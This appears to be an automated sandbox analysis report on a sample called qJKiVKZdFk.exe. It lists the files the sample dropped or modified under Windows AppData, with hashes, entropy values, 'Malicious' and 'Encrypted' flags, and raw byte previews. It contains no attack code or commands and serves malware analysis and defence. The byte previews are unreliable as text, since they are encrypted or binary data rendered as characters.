                                                                                                                                      MD5:9ACD947610B63F0E0DA10A133EAD15D8
                                                                                                                                      SHA1:1008C7B98B5DD40B6D89465A54F90F50152FB9F8
                                                                                                                                      SHA-256:FC57CD4FF085E126CF59BF84A319B407EA03012CD0946ABE14E7CDE8EBDD8A52
                                                                                                                                      SHA-512:A2A4B1A86325950CE407AA21D199116FE774B57C63A0F6524336E3C1236752AE0532CB5C11132AD71624EE7CFE6B12958CC90B67870F92BCB96B695EA3D68251
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf..........S.a.....w7...Z.%"....K[>xm..F.]...E.].]gd..gk.s...z...QC.%.l...Sp.+OZ.^........C.$c.....u#U O......2....\.V...L.......)S...GH..j1.h..Q..U.f..;...*!.uY.?(C<1......j.....4...U.-..}..d.`.A..._p$......a.2..=..y..=u....NV.E...uf..D..?........1e*.l...f9.,F..s.H@....]!..d1.Q+..^.0..Pb?.k.\..1^..[[I.O...S5..Vu=S.../...o..Z>]CY.P...........m....._..B..`..I.DumGhE......w,I.3Y....m...{..........F.... ....V.U.RK~.$..O......kizt,.....d.,:#....^.Fa..o..Z.LE.u...K.@......{A.J-.>K.....y...[P....dW....1x.K..G......zH..,...g..b.)."..+.......`...Op....L....@......8.g"4..g?.......jv..<I)..G.@...........U...O._4..o.]/.,^.g.W.Q...J.7...=..s..`>$.?.7z.l.a>...BJ.@.e-_.....|.ng.....V.Y...,..h.QW..@N.,..W....{e.xF...2....;6...f..t.].......m.._.UR...2['.z'.T.i.u#..Y_.",i.X...v...tIm.....S.U\....^H\-..@-...tB.7rM.]C.o..6......E&....W\.J...?.?.L...fL...,..h"s..K.&*..F.V....p.......K`....$......N..Q..-#._.e...&.g.u/.._.......Y.\Ft..Z..Q.v...7-.g...G...B

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):33102
                                                                                                                                      Entropy (8bit):7.9951822614992345
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:trDMKspN+xhspPG60/1W12CybUuAudPXNspb:iKCN+xhspV7LCUsXNS
                                                                                                                                      MD5:BBF3507919276F2E9C10033DDDF9A78D
                                                                                                                                      SHA1:FEC81DB52A68EF34B3ACC6B9C6B2DEF27CA118F8
                                                                                                                                      SHA-256:F805B6CC78DDF57B76B452B8EFDDD78208D83843B4C2F8AA2CBE1C243B6474C2
                                                                                                                                      SHA-512:12CF434AE663AE045A26C4E24E788A299B6F0C781F5D3BA28C965C1BFA1B5916BB35EA38BE140BA14FBC25289CCFA21EA748BD84D7A43BCA24B402BE592089F7
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:regf...sC.3V.xn29e;)v{...A.x&.f.j..LM?........?...!..}..T~...L..'c.ukL\..4z.H9.h....~Q..r.M*!..y....k0&a...fz.o..Aph.~{...hk...4.^;...O.({....{......+.V..:0.Zm.../w..z..7....d.;.BA,.>.^...`z.9.*K...iG...lZ.....7/..Hg>..*-...R.SK.K%..Bg.<.R....+.....$.../............l.0.Uot})......|..O........._.......'.. [.}...{T.C.Y*.B".../$@!.#..7.).D.h..X:.]...3........._.-7%nG...I.....P...3$.i..6..w7.iu...P..THS...F......M..Jz...f.<H....5.Q2._.x....=...).Y.....Y..o....1O.?..Yk0.x-6.y.:;...L._.{R.P..x-..K.f...v.1......1..n..^.....SOgq_F....0i....M."..X...lL@Cb...'*`".Td..6.:....~8m,...#*A..&.7.X/)R.....Cl.3.n.kZ.S..;...U..F.:.;..A.s........2..i..+.@...(..oR.Xe.<.6.$qk..D`.4..k.I.....=.4j.s.#...................t.)....n-.D...J..G.g.Y...9F.Fi..+..iZB..@gn1`.G.$'.-..4...........0....k......S.....je3~.cGa.......Z..L.|[..]d...tV...n.5....g1.C..+]...DZF.....7Q...^.i.|.Q..g..M..].1r$T..b........c..$..`.]].g...$.|.S...._tlus2.wXa.A"I.wo...}.|..."E..PBw......r

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):45240
                                                                                                                                      Entropy (8bit):7.9953119194404225
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:foCge5Xqqiw2mXmsQMsBdOWr9SqU/tn9SKxrwJGswhcVbiYaPhfqHxBR3jaRY1:wPgRd2stOCtn229k7jp
                                                                                                                                      MD5:14CFF8F88D424EABE4D40E77BA927BAF
                                                                                                                                      SHA1:DB82F39EDFB29D164DA9849C501799E2F87B22A7
                                                                                                                                      SHA-256:EDBF42DC68E646386E30254747652D43E7E5381D68E8D89D5F616E4C88F9C06C
                                                                                                                                      SHA-512:981AF51CDA93DBCDDE1D120664E9EB50116255F6ED8016B4AE8A2C08B1F82EE91F6C9AE7A4CC935350B0C418CCA093E35A5958F30E3180375F757A2FB0DB6B2C
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:E..........3pbF.|.=&..)_.....*ZU.H.*;.a...b.#.....k..CX.=*.?..[...._...j....q...\e....~.I..`n.w,JZ.M...'h....se....E...g{:..?.......5'`......A.G{m..6.I(+p.&r4.Xi.....L....|.w.5.9[E...J...b..-kj...2..%...#)c..nSq\.7....$..lI.;.gn.DO.........o....t!..{.....|<.j.m/..w({..s...R.N9..W..W...NU..;......(.Vl ......o.......s...g9.$....\8{....N6~F_...E.)....?.....@.......I.j.3....c[.+... ....&.........8.h.. ..X.]...5[.jg.l..."g3.U..c.n........Q:../.A....6U.b.j.M.uB.w..=7......./D..@..q.\A.....m...}p...q^!.?,v.g.aIy....q..A..}HT...&..e..6.^Ah.....4....v....X.>.*....=.........zmS)..d.....%(.j....}>.%4...kw..@...J....=P..m..va.~..].m.%-%8.W...[q....V..'..C...!.Y..k..C...B..l.Z.O..'jz.8.*.u.......P....1..@.2..(....{K.4E7......D.Y.B.Z..?...`....%.u92..m8..L(.f1...4M.Z.i.........E..W.f.HF..p ..|...g........{U..LU~`..3...4...A..... ...L~.....7?..F.<..w....Wr.......t....L.v...S.6..e0.d........'b#C..}.`.U...s../.k..[...;+.. ..8.....l.Uag9h....d....r.6mk.......

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.XGpuEjectDialog_cw5n1h2txyewy\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978588927659176
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:RILySiMQPUw3dQ9SgCiiKgA1p/pu9jSZt0xzt1Q5D5:yOdMmR3dcSg0Mtpuxxts
                                                                                                                                      MD5:04BBF330AC5E433172EDF4D775C8AD19
                                                                                                                                      SHA1:AB3DFB691F5D89FD17C77A7DFB7DC398ECF401EB
                                                                                                                                      SHA-256:78F36A64449ED35C2D5096BD258BB887FFA50385F3E41912E9458FA8E97740C0
                                                                                                                                      SHA-512:ADE70E61E1F98EC3C24D247B36662D81DBA9075A0D65B9170986FE9556015FEF850E0E6E336B8651D5BB9AA94AF5E4142CCE2BB4FC834DDE8A5A657A1FA07640
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf....}S....<......w.........jOO....x..4....U,e.N...No..?.iz...5#.4K?8....i.r.U..R.b#Q...8.Q.....p.~.pV{.?.].`MA..9.l..%..?d......|8....8.....5.:N;...l|Q....<.n...1.dI0...Z.....R.eg?....P.r..5sR./.c4...2)e..OI..@@8......A...,...+.b...r.]..F..|..8.8.....9.Ti.,qkG5.3.0k..=4.i...8..P......e.1...A.v.n.....~.E...........v...k`;....Y.B }|.)...M1..... =.......4a\(..X...x7..A)B..-.%.4A-Y/E..7.......9....d.........z...;E..&.....w..1Y...u..>...+.-.E./.T.<5.i......_R..8.$.I.Cl..TU.\.f]^q.....6IR...U.C.Y.|[..@..........$......y.7..$}(.B.....]..5...u.....C.YQ.6..!.`vIvVc..&/....i..fH'%..............0..<.......&@..q!.yr~...ib.v....)...q..q.....=. ..[.q..)e^#.(...<I.#....u...;r.l.\..V....g.#....0..?)E......r.n/.)y..u$.....v.g.pv..B.B...".............3..4.s...z>.....&...&.nPH.}'...dQ...p..W.......x.:..Z.%U.6.}.Hz.-@..../\ ..0....A....."....o..}.L.m.....2..*x...P.'.6.f...>.:b%hd[.X.I......r..=X..b..%..=..j5.F;.. +............]S.....w~}......g...xo."..

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.9788703264918945
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Iai5H/qbpCmK9P0TtE1GAabW/sD0WjGRQQuqDdd+akq:My7gXRpsoWjGmQu2dZkq
                                                                                                                                      MD5:55B7DC151D7A7AAED567DB07A50CC201
                                                                                                                                      SHA1:C6A1AD5F47EE993098302275C576B9BA23EDFEE4
                                                                                                                                      SHA-256:E633FC81A748E5AB3D81A303F7DFE19D7CEE899FE41BB48F5C0DB20F49B85C20
                                                                                                                                      SHA-512:04C452119947675C95D914019BF2F97A5A4CD4BAD81E6630C225CB70506C286E4D8CDD524BDFB86552906125F7C7E956FC531FD32444E8AD8DD36D7FE0224A8C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.......S.D.....<....1Vk....H.e...p..z..|..\P....w..v.t.$.. >......c......ti..0H.}..Z>.............i.:7.P...yrMx...CGK}.G..4bD...q..W..C p.5s..7 .F..'..C..tuG..s.....w`.c..X....ap...........wjb?..!.3...dr2.3h.N....8..j....l.l.K..J..._.....'.>U.oI.V;..D.*...@u~.[...!J...6]...0..[G...T]g....m...jMoH)BB....a@.B...&..EX..nK..S....*.|N......S......}..4..F....a.....f..Z.L......RC.8....../..0......h=......R3.)K.._..[..+r.g...YO.V4. ,L...$..S.@..."...7..)B..d..p9.w.W[.4.6......{cIU.r.W. .....".dZ./.'.UL&I.^.<...}y])[...;zv...ff..0.8...$..wk:?.x7....~v(.).0..d........iL....*Yn|....m.....^J.....o:y.....M..:../4.....z^...!..7.....2J.....R{..........l...s.@.O@ .G.PP..v.".J..MD|q`.G..4....P.;.@.....3Qk......+~.i......;z.Jf...z....B.Z..k..B.:j..XaW.....s8\....}..Wi.$[.*.S.@1B.q`.[.[..E.....).C..".....I../.1.....X.1.......Tf...Q]....Vo.!KW;.....x.s....e6.......J./..;.).S...-....lF...8.8.L. 4....yBR...)#L.l...&.........4c..J....0...>.)..9.......

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.97577772700589
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:GJuJaKrocJUFmnHiajZ/UnzxgwPJbzl/4/+s0CPPH2i4tdcNrqpR:GsYKoulnCC9ud1PJd4/bHWi4tqopR
                                                                                                                                      MD5:08738A00CA5248AD33855D2AA260D4BB
                                                                                                                                      SHA1:A0DF83F74FBEF43AFEF7A228DBA44F9547A43CA5
                                                                                                                                      SHA-256:22350A2ECA7809C91C6618713A553FB765A5848B2D1BCA5DDA5F2F3F7EC7D953
                                                                                                                                      SHA-512:15AFE5DA6CC16D0200F09BE0456C9103DEF8759CE74E0A459B6FA06328CA984ABD74CE2B23FE5F034D198D3760FCFB9141960AA5FF549192B37032962C1107A8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.......Cf."..pKT....._.w.}j.2..|..]6tU.`......$.#)b....E..].\.B.A9...Nk..s.A..W7f...Q .=H.gDUM.M2/.SRw0]. ....Y&..........voP......B..^x............./.....X....s.../..M?...y.~g....P.|.A..H.:....>....9....7>.....`=.B..zn..aA...@8q...."SW.Rd.K.\.D.H......1...i./.Iz.nm..8.='............C~.x.V`c.G..f..-.......T.djaeL.....n@.ZKy 2........9Eo(.(..sq`..-.v2....0.......V...m...~..L.^(Y.....;g1..eI...S..*..B#..L....-HW.h,rAT..<.J...3.=.5....`..T.'{_.##Cz...o{TWmB..,..c.,_mP..V...u.B[tv..t@B...._..w_w.E..=.>.i..}.3D.....[...b.#^X..`.]g..#..q....-X..P....v.O.?..>...<.)..............T m{.rq.'...?.i...J.A...7.G(/25.s6...`..gH.....E..}......J...U.\..B....:.f(../@V.(.8.....N.a..UW'.d..w.......5.'.F5......8.....|_...[S3......if.q?-......l8......@.y.....j._|...$..d..H..J.E..L..U.P...b..1funZ}{..7..t..k...E.d....._.|.}...gh..J.....+n..OM.......Zc..iB1..q.r....qfEU...[.._".k.,%..[..3}...N........dc 'z.............h.f^"]-.Fge..b... $1.s.f........./..P.t.U>

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.9821319769258405
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:NJSJHDpaM+5lgCpybgwyyhIfteK3Bymebdswmc842vqAkt/nK:CJHDkM+3bobgghspbyswI42fkFK
                                                                                                                                      MD5:6D1BCFE7F1F321538ACF76FB05AFC039
                                                                                                                                      SHA1:12286D66934D63D0801C62F248225FC801E95160
                                                                                                                                      SHA-256:6A7ACA10F43224D37F360DB1C023DDF1A6022FA667CC36B72F6332A0F30BA4B0
                                                                                                                                      SHA-512:4A74AF87C119DDC2082A5B246DA99038ACA17A9AEA686F11D0E38369792B6E5A0B2BD15CEE778B41BB83768672AF0CD87EA3162719877433203DD66B1E8221D3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.%.t:..L.b...........).r.......>.fj...z.......\.I.......N..|T..l.z.9..^.8...o...1.Y.{s.....K..;.Mc...wR... .b....MF.K.|...Q..|Z< .5.Y-....il....7.]S..i..8.....|!oY.(._.lv..1.rO..|..).4.0JL.2..?...F..N...%....[V..FF.(..;Q.......sU._.E$...&....d.38..E"...........^O...0.S......<..W. .....W.9.~Q(.g`_L.c.P...'..h..0^;Ls.M..I_.f...k.V..`...1.........O........Ia.*..Qt.j.K..2.G.ea..+..dv..i.-.b..j9c.1u.@}.......d.hs. ....%.}.....]....'..x.S.3tZ.`G..C...9I.Y.S....].%..tS.4...5..........Hn.c.-&.5izwmx.F....`.......6.4......Uu..U.,k.K./P........V.a5...<).O.q|#A..D[..........34z.H..{|....PF2.F..gizC7..A.........-\.$t.....c..xv9."....p.....b.....~..{b..\..(..B,....uY....+...Cb...-D..TE...e....P...Z1............=.........jKe...b.:h...7}((9Os..K.........beY..&>#k.x#....=.7.&.........^...bTP........z..........Rz.!.g.......K.s.{L..\......Rcy.:.8s...>...C*..7.l.....{T..7C....&s....C.S....?."....@.7d..nm'.hB....&(w..G.BwM*!.$...IUUe...G....Q....u.[

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.980200093361607
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:i3AwStKGdbuI/k+crUah1AZ01hrkLP4l5ezvBKK95gZ:jDtG7UC1AZKh4sHKAZ
                                                                                                                                      MD5:60D0B73EBE38E1C2D11FC0BAAA90B471
                                                                                                                                      SHA1:877878D971F0C5ED30228671E30B2ABD8E06C09A
                                                                                                                                      SHA-256:694E5A08BE1E473A4C8C9376CF6ED4A470BC1620390211E41546BB17768C4DB3
                                                                                                                                      SHA-512:1A6D364EA51887D42530B0FB235A7E7583773CE9E268768C580C82545E157B57E56B9801FAD4D23D5298BA0B4646A344C57A91908DED3BF0EECA7E6BE34D45C3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.m.h..aU.H.uT....q*.q....w.*.eN..R...Oh...f......s...x...8....m...>.s~..0....2u.{@.c.a..9b]Y..I..g.[.GW._.y..}......ubk.9.[h.y.8...|.G..Yu...1Bc..........y..f..........o.7W.c..2B..L*..9...N*..._1q`..iu?..i..1.bZ.F..K5..o..C..IQ.`.#2X)...k..".....8..rv.4.vo..<..g5..m2X.c7H.|%.8..........wo..t.m]..P......=D....|.dR}...Za.C}.4...oo.5....,fw.mr.*.(...L......T-.de...Jk.4.|5..=:|.sN...B...di..'r..v[C;.X.L.V(..... ...T..#.\...l3....q..../....c#.... ....Z..i...Q.D(.|.......J...u.?....%.#.4.&N..plWDNb...n..uf..#.{.P_3CJb..%A.'2L.z.A<}.;.T[>.R}...........O.....9..F.J.f.Cc./%(.ULK. ....+..&..G..%..[..P...2.t.B~+z.....Em....F..X......&.t....p[8C.<.L.xg..I'!;..*-.uv..8Sha=..P.<<eG;....].W.H..A.T./*..@...!8ni.FMm......g.u....pb...ipd...F#..R...X.....B.L.,.......F.7"...4.T....U...3..[t.6..$........h.:.?'....*.F.T.........W..`........S...|;..sfQy.M.=Xj...;.f..[......o/Y.x......}.y....... .6..J...@_N.D.K...7^L.`.I.`.5mU.m.N.$mI..B...........-...

                                                                                                                                      C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978874340617128
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:zVKynj4ziV3+65zQdvqd8psUCHPDp7uP0/LCrFecLmNeQ2BUESuixqZx:zIynj4qqRaU+rp00/LUFevMQdufr
                                                                                                                                      MD5:8EF21D0B3373241F1DACD14AFA331DA2
                                                                                                                                      SHA1:94482B210F9A7BF5027C55E209D8FDB933F731C5
                                                                                                                                      SHA-256:9CBE4461D2A04CD25AF95C46A40A32BAF268DA20199DB95EAFFC694533FD9654
                                                                                                                                      SHA-512:7DFD0923F3D7A0067F0D976EDC99B235ADC7BD6B649B4AF6D7998808C0D5DE7F926CF08D38B6439B2E7AD321356870A1FDCC75098F28952496AFF9136E66DDAC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf..3.$..=......}..R...!.....j...+....q/....f../...Sv..t.&%.D....d.g.t....&U...tO...G.%.cT.9....Ne...eq...~...F...F......S...|UPI.f.8E.......7....u.'..X._.m.t. .,;.l...2...,...7..;;....!.(T.S.G.....I..j.t#.F..2..7t).....*.k.X...J.h/e|6.Z_4!.[...........A.......x?fKYF*0..!8%....p..^....g..b..X.g..+....6m9.....3..PrD.B.....?...N.H&.....`.....{. . ....(r.v`._QC%...?X..K.l%.R...4..@....s]....|...~RW%.....T....=..k..xr"..Ii<z.>l...lI.C.7.Tmv..E.....h.T"..W.0dA1.u...7D..f.fb.<..<i....8..z@V.{mL1M.E.\K.a....I.?..(...]....&.N..P........^.).....#..G....S......mF..z....vE.k.p..$.A.....J..F..q.2...~viR..........K.8..e.jT.^..9...z&.$.r......N...-.>.U.r..O....;..w..H...%..O..6.v.'..........!......>...~\.O^I...C..!.R.|.P.VC_.s.....xL..f...~.P_I..*.XoM..0R.S....".xq..L1...|.j6.b........72....R.q...4....D.b..c...A.....B.qq..2..6y.l%....qA.ip:..u.........%d..XX....2R....e.......u^..^..ObBq.f.e.u...U<FAH..u..0-.....O.P.<.9...o/Y...D.M....'J.F

                                                                                                                                      C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):65870
                                                                                                                                      Entropy (8bit):7.997158329420736
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:knjaluaYRduiavahVr9Uw3jK4YDWsxQgWhb1pRZ1EEa:kjPaY/uiav+p1YiLgI53rm
                                                                                                                                      MD5:863CF993E03F4971185FE786CB30A0C6
                                                                                                                                      SHA1:1A630E90F736EF086E05D86B56CA48E6A7D998BB
                                                                                                                                      SHA-256:F5731FB0B615149F02CDD26B18BA14A2E8F810A2FE8A4AF50F210F404CB534E9
                                                                                                                                      SHA-512:5F52BAB7558C682A786B16574F008741CF43E966D4F2B9DC051076A126655005E819651BD8AD2F1898FF61CFC36CF9509E44D7DC797EEC60DB2D1EA2A9A94ACE
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:.....c. 3....H....5.NKR.. .w.U..w..r.}..~.8%^..a..W....>..$..\...{.E...kO..HS.?D.2......X).o=!G.~...DTw l..l+....H.c_J...?....rH..91.'.<.7#CI0C).~^..W...`.`.H.8.o|R.s.1....u..L.O.$v...HM.m....[..PW..m.\..@..).~....L.^........ .KZ..H.<...ukc..IC.`.G....R...J.w0K..K NU.`:......P..f...X......%.....n.}..J......@....Z....q...2^5.....3...1.A'....O{..-...jt$.?XrJ>.|.A6.l... W.....;y+...lG..%C.....[f.P...E..n...K.d...Q_.q...M..._...../*.W{.sP.9..&..~..]?....4...BD0....&...}w...!...iZ=...`U+.a`.9.*+..<-R.uAZ.0...%...f.=.d....,):....].x._.2.J..]...=.[9..H/.j..i.H...;....e..)...........5Nj..w.!.S../.6......0..F...E9.I.2z._.R..,...b.p.:..mVm......?.kW...E1.@....!.C.Vz.N.B.....t...C.EZ.v...Xe....%....Rs...\..}..K..Sv2X.....PB<.IE....{A.........G%.iv|.....a.G.<Yr.F.&<a.........n9h.:qH.G.*8..P.dzq.^f.l-....yzh_`. ..VZ....V."....S.(.=%~..2.|Ou.. ."`#....s....U.+.#.7..>...$......s1.4`......< . ..,.-.U*.4O.....;09...z{j..g.R..6.....K?C'^...p.8.;..y.J.S.O...

                                                                                                                                      C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8547662
                                                                                                                                      Entropy (8bit):5.204810424984452
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:w5ct438OPKW0ANge+q80Ibxh0T4tI6lIfKi5YJj1PKu1ZKKOb:UlF1qd/LKNb
                                                                                                                                      MD5:D790D5AC4C90B4A53D8400FCD6568FA9
                                                                                                                                      SHA1:503FA520D42F0A58E3C49D8A272C144830D0D922
                                                                                                                                      SHA-256:2CB61EAD62987A003904B6EF8B31B573313B584607C7D2656E47D1FD59590A8D
                                                                                                                                      SHA-512:E3001366DDF5E598AD589F3454F2FA784D549635B616FFAA555CA907A6FF92806718F273D79ED50FA901F7C35889F7C18CC9EA46A1DA49C24E138E6D65426421
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:Micro~;<-.2]..0..E0.|v[..@...Mk.=.\ .......o/..p*w...k....*.}%...*(...}..(.2...l..].:dW......a..?_ ....C.L..v<.SL.....Yz......P_.<e8F..AO.`..dE.<!..U+..?:X.....'..'\s...q=.f.d;....dX"...... ..&.<.|.K".......rR...`H..5.}y-)kg...."?...x.?A...6.'.M.M.j..{..PxW.E.9.4.oJO.}.....[..".xD5.....n....9.....#......-W.p...o_.....U...Z2.?r..\.V...zfaWO>x=$..p.Uv.<.?:.R.s.....,..,/.%.%-.o2..Y.jc.h0..r......!....(.&.J.......L.......<.at...W...F.R.G.S=....qb..h...D.6...M....&..5a.....F..F...>s.N.F[.....{.O.y.B.Zv.6..^...,_S.S..{[. n.5l.~_...........#.}.......Z...R.".h..?.I..?.....Tr\..7...1y.Z.kJ.C.......-s.o.cg1G..."`.h*.X..-......n.....c...BP-..V.C.7....&...2.B.]gg...>2.cQ.xcM...w.l|.]1-R^.....}... M.J..$..].........6~....e....6.IQ...qKe.....0+....Hq=...........&.........x6..8!.....<.s.6.5.).....Pa..K..PPa.....zP...}..-..y4..;..t...K..^4...............t..._~....bii.;....C........&...L..O.E..y?....F....tq.~...wY.N....L..3G.<~/.O.>..;.a.=1.).b

                                                                                                                                      C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8547662
                                                                                                                                      Entropy (8bit):5.204931042008443
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:rxbWR38OPKW0ANge+q80Ibxh0T4tI6lIfKi5YJj1PKu1ZKKO1:tbWtF1qd/LKN1
                                                                                                                                      MD5:5B0E6661EF03B1B36846B1C0C49F29E4
                                                                                                                                      SHA1:02A8E59FE50C0975753CDEFE9410EDB088F7EDEA
                                                                                                                                      SHA-256:D53F48BB303683BA10C7079E5C0369F5CF48C759151C0EA0E2E443601158F7AF
                                                                                                                                      SHA-512:0C325A6C9A707086F07331CBB04158DBC6CDFF1C4531E1DF4B7854A6FE8A86FEE479EE1745974EC7C8A16AF2A19CAEA7F8B2BDAF46C1AA5EA30C11B07C4D0C8D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:Micro~P....)..1...H...t.X....f...h.j..,....K...OJ.......(.5....V.G.J...........+#...b..b....6.N...A..`.l5cs...\...]...p.u.L...<...K....,....ST..$......HSn.%..F..c.DS.z..3.l.<..G..mbN...=..J..=.....;#.Zc.1U....o..6.x.....L.a./...&..a.s..}L....>.)#..XI...K.'V.P).'T....P..(....s'.........~^.3..{.- ..@,r=...[ol..!.....JH*.$w.....bo>.usv.^.7Z>#q{&....T..i...R.....g.e...us.5.u..*.:.^:...*.M.kG.Z........*jH.3.W.7dD...X.....(....ubF.\x,.w......(...P.0.+)[7....J...>.GI/..."&.5:.....1F....\O...8..A..=3.....A..P}.X1.qO*.t.e-....7r.;mu....n..Jf.x..A..@..5T.......X!.H...:....e:. ..9oN.....l..5*./r..f...7..n..?4.....O...w])qV...1...vc.b].&.O......w.'..q`...Haiq..[......h..~.R...n...=...)}..K.+.^...gEAV..q.J..&..!.^...-......n.!.*:+.~F..S,z.-....,.K.4..,..}....i.c.:...w $tf."..P........u...7.T.....C.....E.^nj...#.."V."...\0U..phN;h...1...e.J...G....At.j...D.g...\.X.s.#..:x...)r....!"....p.*w.3........;!2...)J.g.}.?...b...B1b.'.<.8..Ss.].!.9.......

                                                                                                                                      C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1192270
                                                                                                                                      Entropy (8bit):5.662648344309657
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:g8fXtXs+E5EpvJQ4aKVmaS4aMz8Pg3lxJo2cvXtR:g8hA4BaKVzaYcAqtR
                                                                                                                                      MD5:25673FB6B6C5A1EF69CE053808248926
                                                                                                                                      SHA1:5F4E96B260F52F8D4FEA124EF11ADE70CDEEE325
                                                                                                                                      SHA-256:24DA62664214D8D3B1157193833C2C69D3AB0C42D70F39A7A86DC20FD266D593
                                                                                                                                      SHA-512:2A768819952B5C846547862EEA0E8459986F33575254E19147B00479E43A41E67E3145624B11C168E8095564B16DE9F547203C36CC98FF8F19F78950423B18DA
                                                                                                                                      Malicious:false
